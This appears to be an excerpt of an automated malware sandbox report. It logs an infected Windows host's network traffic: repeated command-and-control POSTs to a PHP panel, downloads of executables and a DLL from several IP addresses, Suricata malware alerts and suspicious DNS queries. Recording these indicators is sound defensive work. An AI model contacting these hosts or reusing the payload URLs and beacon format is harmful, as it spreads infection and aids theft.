Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 185.215.113.16 185.215.113.16
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49770 -> 104.21.10.6:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49778 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49760 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49777 -> 104.21.10.6:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49784 -> 104.21.10.6:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49801 -> 104.21.10.6:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49812 -> 104.21.10.6:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49815 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49793 -> 104.21.10.6:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49819 -> 104.21.10.6:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49833 -> 104.21.10.6:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49834 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49838 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49841 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49862 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49855 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49870 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49876 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49888 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49893 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49908 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49926 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49938 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49950 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49980 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49995 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50004 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50014 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50022 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50031 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50037 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50044 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50052 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50065 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50072 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50241 -> 51.116.246.106:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50261 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50263 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50269 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50270 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50277 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50266 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50278 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50281 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50273 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50275 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50259 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50274 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50280 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50311 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50321 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50322 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50318 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50300 -> 104.21.33.116:443
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /files/6639161109/r5mqFEC.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /files/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Sun, 24 Nov 2024 12:34:33 GMTIf-None-Match: "67431d59-1c6200"
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Sun, 24 Nov 2024 12:34:40 GMTIf-None-Match: "67431d60-1b7e00"
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Sun, 24 Nov 2024 12:32:47 GMTIf-None-Match: "67431cef-e1000"
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Sun, 24 Nov 2024 12:33:14 GMTIf-None-Match: "67431d0a-2af400"
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/random.exe HTTP/1.1Host: 31.41.244.11If-Modified-Since: Sun, 24 Nov 2024 12:19:04 GMTIf-None-Match: "674319b8-42ea00"
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
Source: global traffic DNS traffic detected: DNS query: push-hook.cyou
Source: global traffic DNS traffic detected: DNS query: home.fvtekk5pn.top
Source: global traffic DNS traffic detected: DNS query: property-imper.sbs
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: fvtekk5pn.top
Source: global traffic DNS traffic detected: DNS query: js.monitor.azure.com
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: push-hook.cyou
Source: a7f098a093.exe, 0000000C.00000003.2547058326.0000000007052000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://.css
Source: a7f098a093.exe, 0000000C.00000003.2547058326.0000000007052000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://.jpg
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://127.0.0.1:
Source: e5e907fecb.exe, 0000000F.00000003.3204335566.0000000000ED3000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.3205264572.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
